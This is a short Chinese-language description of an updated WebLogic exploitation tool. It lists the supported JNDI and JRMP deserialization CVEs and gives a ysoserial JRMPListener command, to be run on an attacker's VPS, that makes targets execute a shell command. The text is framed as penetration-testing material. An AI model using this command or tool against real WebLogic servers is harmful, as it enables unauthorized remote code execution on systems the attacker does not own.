WebLogic漏洞利用工具最新版本

漏洞利用工具针对WebLogic的最新漏洞进行了升级，支持的漏洞包括CVE-2023-21931（JNDI）、CVE-2023-21839（JNDI）、CVE-2020-2551（JRMP）等多个漏洞。其中，JRMP类型的漏洞攻击需要使用特定的模块，可以在VPS上通过yso启动JRMP，然后在工具中填入VPS的JRMP地址。具体的攻击命令如下：java -cp ./ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsCollections3 'touch /tmp/1.txt'。该工具版本要求使用JDK 8，并可用于执行未授权访问、远程代码执行等攻击。用户可以根据需要选择合适的漏洞进行利用，提高渗透测试和安全评估的效果。